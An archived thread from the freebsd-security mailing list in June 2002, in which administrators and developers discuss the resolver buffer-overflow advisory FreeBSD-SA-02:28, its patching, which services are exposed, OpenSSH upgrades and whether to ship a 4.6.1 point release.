User-Agent: Mutt/1.3.27i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Please don't CC me in replies to Brett, I have no idea why he chose to include my email in the CC list on this tirade, but I'd rather not have it blighting my inbox. thanks! -Alfred To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 10:41: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by hub.freebsd.org (Postfix) with ESMTP id 2CDE837B401; Thu, 27 Jun 2002 10:40:56 -0700 (PDT) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id g5RHet113251; Thu, 27 Jun 2002 12:40:55 -0500 (CDT) Received: (from root@localhost) by sprint.centtech.com (8.11.6+Sun/8.11.6) id g5RHesN15433; Thu, 27 Jun 2002 12:40:54 -0500 (CDT) Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g5RHeqR15426; Thu, 27 Jun 2002 12:40:52 -0500 (CDT) Message-ID: <3D1B4E24.1F91E51D@centtech.com> Date: Thu, 27 Jun 2002 12:40:52 -0500 From: Eric Anderson X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: Robert Watson Cc: Matthew Dillon , security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I mentioned this a while back, and I still think it's a good idea (once once OpenSSH is ready). Like we were saying with the Apache bug - those who don't read the lists, are typically RELEASE hungry, and will jump all over a 4.6.1 without really caring that it's mostly security fixes - and those that do follow the lists, will have their stuff patched and ready before the 4.6.1 rolled out, so we get best of both worlds. That's just my $0.02 - not meaning much without an @freebsd.org at the end of my email. :) Eric p.s. - should this move to -chat? Robert Watson wrote: > > On Thu, 27 Jun 2002, Matthew Dillon wrote: > > > I'm beginning to think that once all this settles down a 4.6.1 release > > may be a good idea. Apache, ssh, now the resolver... nasty. > > I've been wondering about that also. However, the release engineering > process is fairly heavy-weight, and the last time we did a light-weight > x.x.1 release, people leapt on that opportunity to over-load it with lots > of minor fixes that ended up making it a fairly broken release (since > inevitably they weren't minor, but we weren't willing to do a full > heavy-weight release). Regardless, we'd want to wait to spin a .x.x.1 > release until the new OpenSSH was merged back, I think, so it will be a > bit yet before we can really make a decision on this. The best strategy > would be to literally slap down another tag on RELENG_4_6 and call it > RELENG_4_6_1 point-release. -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology He who laughs last didn't get the joke. ------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 11: 7:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id C99E237B430; Thu, 27 Jun 2002 11:06:47 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA05753; Thu, 27 Jun 2002 12:06:41 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020627120145.02451c10@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Thu, 27 Jun 2002 12:06:34 -0600 To: Robert Watson From: Brett Glass Subject: Re: resolv and dynamic linking to compat libc Cc: bright@mu.org, odela01@ca.com, freebsd-security@FreeBSD.ORG In-Reply-To: References: <200206271617.KAA04440@lariat.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 10:55 AM 6/27/2002, Robert Watson wrote: >Apache is actually a fairly unlikely target for the libc resolver attack, >because it's default shipped both as dynamically linked, I seem to have a mix of static and dynamic linking among the machines I host. When it links dynamically, it seems to use libc 3. For example: httpd: -lcrypt.2 => /usr/lib/libcrypt.so.2.0 (0x2008b000) -lc.3 => /usr/lib/libc.so.3.1 (0x200a0000) >and because it >doesn't ship doing reverse DNS lookups by default for performance reasons. It doesn't do reverse DNS in the logs unless you turn on HostNameLookups, that's true. But if you enable access control on a directory it seems to look up the client. >Far more likely targets are tools such as sendmail or sshd, which do >predictable DNS lookups based on externally generated network traffic. Very true. Sendmail in particular might be a problem. >We are aware of the ftp apache package problem and attempting to resolve >it. Thank you! --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 11:11:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id DDF7837B409 for ; Thu, 27 Jun 2002 11:11:52 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA05808; Thu, 27 Jun 2002 12:11:46 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020627121059.02451ac0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Thu, 27 Jun 2002 12:11:38 -0600 To: From: Brett Glass Subject: RE: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Cc: In-Reply-To: References: <200206271658.g5RGweBm068044@apollo.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 11:02 AM 6/27/2002, Joe Black wrote: >Might as well be running linux. Have you double-checked to make sure that glibc doesn't have the same bug? --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 11:17:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.web.de (smtp02.web.de [217.72.192.151]) by hub.freebsd.org (Postfix) with ESMTP id 0C5DD37B445 for ; Thu, 27 Jun 2002 11:17:10 -0700 (PDT) Received: from [217.225.204.77] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.70 #5) id 17NdpM-00062h-00; Thu, 27 Jun 2002 20:17:08 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 23801226; Thu, 27 Jun 2002 20:17:07 +0200 (CEST) Received: from jan-linux.lan (jan-linux.lan [192.168.0.20]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id C39F76E; Thu, 27 Jun 2002 20:17:03 +0200 (CEST) Subject: Re: resolv and dynamic linking to compat libc From: Jan Lentfer To: Brett Glass Cc: FreeBSD Security Mailling List In-Reply-To: <4.3.2.7.2.20020627120145.02451c10@localhost> References: <200206271617.KAA04440@lariat.org> <4.3.2.7.2.20020627120145.02451c10@localhost> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7-1mdk Date: 27 Jun 2002 20:17:01 +0200 Message-Id: <1025201821.2815.52.camel@jan-linux.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Am Don, 2002-06-27 um 20.06 schrieb Brett Glass: [..] > Very true. Sendmail in particular might be a problem. What about postfix then? I postfix does reverse lookups as a default (at least I see that in the logs and can't remember I turned that on). I think postfix is dynamically linked, so re-building world should be ebough, right? Thanks, Jan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 11:19:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from guest.cg.nu (guest.cg.nu [213.196.7.60]) by hub.freebsd.org (Postfix) with ESMTP id 9C2D037B406 for ; Thu, 27 Jun 2002 11:18:55 -0700 (PDT) Received: (qmail 3368 invoked by uid 85); 27 Jun 2002 18:18:54 -0000 Received: from unknown (HELO wevers.org) (213.84.69.96) by guest.cg.nu with SMTP; 27 Jun 2002 18:18:51 -0000 Message-ID: <3D1B5709.8010902@wevers.org> Date: Thu, 27 Jun 2002 20:18:49 +0200 From: Henk Wevers User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0rc2) Gecko/20020512 Netscape/7.0b1 X-Accept-Language: en-us, en MIME-Version: 1.0 To: security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv References: <3D1B4E24.1F91E51D@centtech.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 hosted on guest.cg.nu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Is it possible that all the port mantainers bump the portversion one number higher, so that upgrading is more easy to update an package like apache? I allready updated apache for an example, only not after the new make world again. If i do this i will need to deinstall and reinstall the port. My EUR 0.02 cents Henk Eric Anderson wrote: > I mentioned this a while back, and I still think it's a good idea (once once > OpenSSH is ready). Like we were saying with the Apache bug - those who don't > read the lists, are typically RELEASE hungry, and will jump all over a 4.6.1 > without really caring that it's mostly security fixes - and those that do follow > the lists, will have their stuff patched and ready before the 4.6.1 rolled out, > so we get best of both worlds. > > That's just my $0.02 - not meaning much without an @freebsd.org at the end of my > email. :) > > Eric > > p.s. - should this move to -chat? > > > Robert Watson wrote: > >>On Thu, 27 Jun 2002, Matthew Dillon wrote: >> >> >>> I'm beginning to think that once all this settles down a 4.6.1 release >>> may be a good idea. Apache, ssh, now the resolver... nasty. >> >>I've been wondering about that also. However, the release engineering >>process is fairly heavy-weight, and the last time we did a light-weight >>x.x.1 release, people leapt on that opportunity to over-load it with lots >>of minor fixes that ended up making it a fairly broken release (since >>inevitably they weren't minor, but we weren't willing to do a full >>heavy-weight release). Regardless, we'd want to wait to spin a .x.x.1 >>release until the new OpenSSH was merged back, I think, so it will be a >>bit yet before we can really make a decision on this. The best strategy >>would be to literally slap down another tag on RELENG_4_6 and call it >>RELENG_4_6_1 point-release. > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 11:28: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from temne.zahrobie.sk (temne.zahrobie.sk [212.89.236.90]) by hub.freebsd.org (Postfix) with SMTP id D738E37B423 for ; Thu, 27 Jun 2002 11:27:38 -0700 (PDT) Received: (qmail 4127 invoked by uid 0); 27 Jun 2002 18:25:08 -0000 Received: from localhost (HELO brano) (127.0.0.1) by localhost with SMTP; 27 Jun 2002 18:25:08 -0000 Message-ID: <05d001c21e08$75fc5d00$c28c630a@brano> From: "[brano]" To: References: <3D1B4E24.1F91E51D@centtech.com> <3D1B5709.8010902@wevers.org> Subject: OpenSSH_3.4p1 Date: Thu, 27 Jun 2002 20:28:38 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1250" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 Disposition-Notification-To: "[brano]" X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi all, I install OpenSSH_3.4p1 to my FreeBSD 4.5-RELEASE but it doesn't support compression. log => OpenSSH_3.4p1, SSH protocols 1.5/2.0, OpenSSL 0x0090601f debug1: Reading configuration data /usr/local/etc/ssh_config debug1: Rhosts Authentication disabled, originating port will not be trusted. debug1: ssh_connect: needpriv 0 debug1: Connecting to localhost [127.0.0.1] port 22. debug1: Connection established. debug1: identity file /home/brano/.ssh/id_rsa type -1 debug1: identity file /home/brano/.ssh/id_dsa type -1 debug1: Remote protocol version 2.0, remote software version OpenSSH_3.4p1 debug1: match: OpenSSH_3.4p1 pat OpenSSH* Enabling compatibility mode for protocol 2.0 debug1: Local version string SSH-2.0-OpenSSH_3.4p1 debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received no matching comp found: client zlib server none debug1: Calling cleanup 0x80631a4(0x0) how can I fix it ? Thanks Brano from Slovakia To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 11:31:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.web.de (smtp02.web.de [217.72.192.151]) by hub.freebsd.org (Postfix) with ESMTP id 69D5037B418 for ; Thu, 27 Jun 2002 11:30:01 -0700 (PDT) Received: from [217.225.204.77] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.70 #5) id 17Ne1o-0000yK-00; Thu, 27 Jun 2002 20:30:00 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 9BB5D226; Thu, 27 Jun 2002 20:29:59 +0200 (CEST) Received: from jan-linux.lan (jan-linux.lan [192.168.0.20]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id EA6376E; Thu, 27 Jun 2002 20:29:55 +0200 (CEST) Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv From: Jan Lentfer To: Henk Wevers Cc: security@freebsd.org In-Reply-To: <3D1B5709.8010902@wevers.org> References: <3D1B4E24.1F91E51D@centtech.com> <3D1B5709.8010902@wevers.org> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7-1mdk Date: 27 Jun 2002 20:29:53 +0200 Message-Id: <1025202594.2815.55.camel@jan-linux.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Am Don, 2002-06-27 um 20.18 schrieb Henk Wevers: [...] > I allready updated apache for an example, only not after the new make > world again. If i do this i will need to deinstall and reinstall the port. [...] If I understood everything right, apache is ok by just rebuilding the world since apache is dynamically linked? Am I right? Regards, Jan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 11:53:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from relay.ie-online.it (dns.ie-online.it [212.110.22.137]) by hub.freebsd.org (Postfix) with ESMTP id D437D37B406; Thu, 27 Jun 2002 11:53:45 -0700 (PDT) Received: from 127.0.0.1 (localhost.ie-online.it [127.0.0.1]) by dummy.domain.name (Postfix) with SMTP id ADA8B47B71; Thu, 27 Jun 2002 20:53:44 +0200 (CEST) Message-Id: <3.0.5.32.20020627205338.00943100@civetta.gufi.org> X-Sender: riva@civetta.gufi.org X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Thu, 27 Jun 2002 20:53:38 +0200 To: Robert Watson , Matthew Dillon , Eric Anderson From: Stefano Riva Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Cc: security@FreeBSD.ORG In-Reply-To: References: <200206271658.g5RGweBm068044@apollo.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I see your point of view, but being Apache and OpenSSH third-party applications and being the libc bug at least common to NetBSD and OpenBSD, maybe rolling out 4.6.1 wouldn't be appropriate. Probably a 4.6.1 release would become easy food for trolls, also because many people remember the overall quality of 4.1.1. --- Stefano Riva sriva@gufi.org Gruppo Utenti FreeBSD Italia http://www.gufi.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 12: 6:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from ac.wox.org (dsl-64-130-222-85.telocity.com [64.130.222.85]) by hub.freebsd.org (Postfix) with SMTP id CAAF937B43C for ; Thu, 27 Jun 2002 12:04:26 -0700 (PDT) Received: (qmail 35995 invoked by uid 1001); 27 Jun 2002 19:04:25 -0000 Date: Thu, 27 Jun 2002 12:04:25 -0700 From: Amit Chakradeo To: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Message-ID: <20020627120425.C91402@ac.wox.org> Mail-Followup-To: freebsd-security@freebsd.org References: <200206261908.g5QJ8MOE035394@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206261908.g5QJ8MOE035394@freefall.freebsd.org>; from security-advisories@freebsd.org on Wed, Jun 26, 2002 at 12:08:22PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Is it just me, or is somebody else getting pgp key errors on freebsd advisories ? Here is what I get when I try to get the key from keyserver: gpg: requesting key 73D288A5 from HKP keyserver wwwkeys.us.pgp.net gpg: key 73D288A5: invalid self-signature on user id "FreeBSD Security Officer < security-officer@freebsd.org>" gpg: key 73D288A5: no valid user IDs gpg: this may be caused by a missing self-signature gpg: Total number processed: 1 gpg: w/o user IDs: 1 Here is what I get when I try to verify message after importing the key: gpg: Signature made Wed Jun 26 12:04:25 2002 PDT using RSA key ID 73D288A5 gpg: Can't check signature: public key not found What gives ? Shouldn't we be looking at these things ? Thanks Amit P.S. I can verify other advisories fine (NetBSD etc.) so there mustn't be a client/gpg setup problem... On Wed, Jun 26, 2002 at 12:08:22PM -0700, FreeBSD Security Advisories wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > ============================================================================= > FreeBSD-SA-02:28.resolv Security Advisory > The FreeBSD Project > > Topic: buffer overflow in resolver > > Category: core > Module: libc > Announced: 2002-06-26 > Credits: Joost Pol > Affects: All releases prior to and including 4.6-RELEASE > Corrected: 2002-06-26 06:34:18 UTC (RELENG_4) > 2002-06-26 08:44:24 UTC (RELENG_4_6) > 2002-06-26 18:53:20 UTC (RELENG_4_5) > FreeBSD only: NO > > I. Background > > The resolver implements functions for making, sending and interpreting > query and reply messages with Internet domain name servers. > Hostnames, IP addresses, and other information are queried using the > resolver. > > II. Problem Description > > DNS messages have specific byte alignment requirements, resulting in > padding in messages. In a few instances in the resolver code, this > padding is not taken into account when computing available buffer > space. As a result, the parsing of a DNS message may result in a > buffer overrun of up to a few bytes for each record included in the > message. > > III. Impact > > An attacker (either a malicious domain name server or an agent that > can spoof DNS messages) may produce a specially crafted DNS message > that will exploit this bug when parsed by an application using the > resolver. It may be possible for such an exploit to result in the > execution of arbitrary code with the privileges of the resolver-using > application. Though no exploits are known to exist today, since > practically all Internet applications utilize the resolver, the > severity of this issue is high. > > IV. Workaround > > There is currently no workaround. > > V. Solution > > Do one of the following: > > 1) Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6 > or RELENG_4_5 security branch dated after the correction date > (4.6-RELEASE-p1 or 4.5-RELEASE-p7). > > 2) To patch your present system: > > The following patch has been verified to apply to FreeBSD 4.5 and > FreeBSD 4.6 systems. > > a) Download the relevant patch from the location below, and verify the > detached PGP signature using your PGP utility. > > # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:28/resolv.patch > # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:28/resolv.patch.asc > > b) Execute the following commands as root: > > # cd /usr/src > # patch < /path/to/patch > > c) Recompile the operating systems as described in > . > > Note that any statically linked applications that are not part of > the base system (i.e. from the Ports Collection or other 3rd-party > sources) must be recompiled. > > VI. Correction details > > The following list contains the revision numbers of each file that was > corrected in FreeBSD. > > Path Revision > Branch > - ------------------------------------------------------------------------- > src/lib/libc/net/gethostbydns.c > RELENG_4 1.27.2.2 > RELENG_4_6 1.27.10.1 > RELENG_4_5 1.27.8.1 > src/lib/libc/net/getnetbydns.c > RELENG_4 1.13.2.2 > RELENG_4_6 1.13.2.1.8.1 > RELENG_4_5 1.13.2.1.6.1 > src/lib/libc/net/name6.c > RELENG_4 1.6.2.6 > RELENG_4_6 1.6.2.5.8.1 > RELENG_4_5 1.6.2.5.6.1 > src/sys/conf/newvers.sh > RELENG_4_6 1.44.2.23.2.2 > RELENG_4_5 1.44.2.20.2.8 > - ------------------------------------------------------------------------- > > VII. References > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.7 (FreeBSD) > > iQCVAwUBPRoQOVUuHi5z0oilAQG3cAP/d7Gb2rdkSjZKCR0NI+QzMibgySVTXOtF > sdoJrYka/XnIpFMVAyXl36bibtRKbwfCyv/rEX39YSas7tqReizwAABoaRF956Qb > qlek1ONvvd+Tj6+WpEEueX/VdPqGQuqMk0BoguIbOgwAya6ZFYJ9ZKAHHSN9YqO8 > ZGTC8pmqfGI= > =s76v > -----END PGP SIGNATURE----- > > This is the moderated mailing list freebsd-announce. > The list contains announcements of new FreeBSD capabilities, > important events and project milestones. > See also the FreeBSD Web pages at http://www.freebsd.org > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-announce" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 12: 9:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 17A5837B486 for ; Thu, 27 Jun 2002 12:07:53 -0700 (PDT) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.12.4/8.12.4) with SMTP id g5RJ7kbM011210; Thu, 27 Jun 2002 15:07:46 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Thu, 27 Jun 2002 15:07:46 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Jan Lentfer Cc: Henk Wevers , security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-Reply-To: <1025202594.2815.55.camel@jan-linux.lan> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 27 Jun 2002, Jan Lentfer wrote: > Am Don, 2002-06-27 um 20.18 schrieb Henk Wevers: > > [...] > > I allready updated apache for an example, only not after the new make > > world again. If i do this i will need to deinstall and reinstall the port. > [...] > > If I understood everything right, apache is ok by just rebuilding the > world since apache is dynamically linked? Am I right? Check the binaries installed by the Apache package using 'file' utility, but yes: our package *should* install dynamically linked binaries, and so a rebuild of world *should* be sufficient. This assumes that your apache package is recent enough that it uses the most recent version of libc. Speaking of which, we probably need to generate updated libc's for the compat libraries... Robert N M Watson FreeBSD Core Team, TrustedBSD Projects robert@fledge.watson.org Network Associates Laboratories To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 12:38:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.fibertel.com.ar (mta3.fibertel.com.ar [24.232.0.163]) by hub.freebsd.org (Postfix) with ESMTP id 88E8037B407; Thu, 27 Jun 2002 12:38:05 -0700 (PDT) Received: from juan (24.232.67.221) by mail.fibertel.com.ar (5.5.034) id 3D19BD4900065552; Thu, 27 Jun 2002 16:36:18 -0300 Date: Thu, 27 Jun 2002 16:39:46 -0300 From: "JP Villa (Datafull.com)" X-Mailer: The Bat! (v1.60m) Reply-To: "JP Villa (Datafull.com)" X-Priority: 3 (Normal) Message-ID: <41256714305.20020627163946@datafull.com> To: owner-freebsd-security@FreeBSD.ORG, Dag-Erling Smorgrav Cc: freebsd-security@FreeBSD.ORG Subject: Re[2]: openssh OR openssh-portable In-Reply-To: References: <3D1AD7C4.9020909@cerint.pl> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Taking a look at the handbook, it's pretty clear that -STABLE is not an option for production boxes. Personally, I prefer to stick with RELENG_4_6 because of this. Then, the question is: What do I have to do with OpenSSH? (don't tell me 2.9, I want the latest codebase possible) The platform integration is not an issue for me right now, as I just want the basic functionality and get some good sleep. I think the original question was pointing to this too, so I rephrase: openssh or openssh-portable? or maybe openssh 3.4 properly merged on a production codebase? and in that case, when? Best regards, Juan Pablo Villa DATAFULL.COM Sysadmin Cuatro Cabezas S.A. Buenos Aires, Argentina Thursday, June 27, 2002, 9:29:29 AM, you wrote: DES> Marcin Gryszkalis writes: >> Which port should I use (I'm migrating from -stable basesystem ssh) DES> Neither. Calm down and wait for 3.4p1 to hit -STABLE. DES> DES To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 13:19:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id AF39B37B400 for ; Thu, 27 Jun 2002 13:19:36 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id OAA18152 for ; Thu, 27 Jun 2002 14:19:26 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020627141350.024ff190@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Thu, 27 Jun 2002 14:19:14 -0600 To: security@FreeBSD.ORG From: Brett Glass Subject: glibc and the resolv bug Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Because I program professionally, I don't read GPLed code due to license concerns. (If one has read GPLed code, it may be possible for someone to argue that work you do later is derivative and that you must give it away.) However, out of curiosity, I asked a programmer who does work on GPLed code to look at the portions of glibc that correspond to the buggy resolution code in the BSD libc. According to this programmer, the glibc code appears to have been derived from the BSD code, but the bug was fixed -- apparently some time ago. And the programmer who did so left a note, set off by "XXX", saying that he had done so. He did not, however, do the responsible thing and notify users of other platforms that the bug was likely to exist in their C libraries. Hence, we're left with the mess we have now. --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 13:22:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id A219837B408; Thu, 27 Jun 2002 13:22:08 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id OAA18322; Thu, 27 Jun 2002 14:21:50 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020627142008.024fd570@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Thu, 27 Jun 2002 14:21:37 -0600 To: Stefano Riva , Robert Watson , Matthew Dillon , Eric Anderson From: Brett Glass Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Cc: security@FreeBSD.ORG In-Reply-To: <3.0.5.32.20020627205338.00943100@civetta.gufi.org> References: <200206271658.g5RGweBm068044@apollo.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:53 PM 6/27/2002, Stefano Riva wrote: >Probably a 4.6.1 release >would become easy food for trolls, also because many people remember the >overall quality of 4.1.1. Fixing bugs is ALWAYS the responsible thing to do. I'd vote in favor of a point release and would be willing to help with the engineering (to the extent that I can, given that I'm not a committer). Perhaps 4.6.1 could demonstrate that 4.1.1 was a fluke. --Brett Glass To 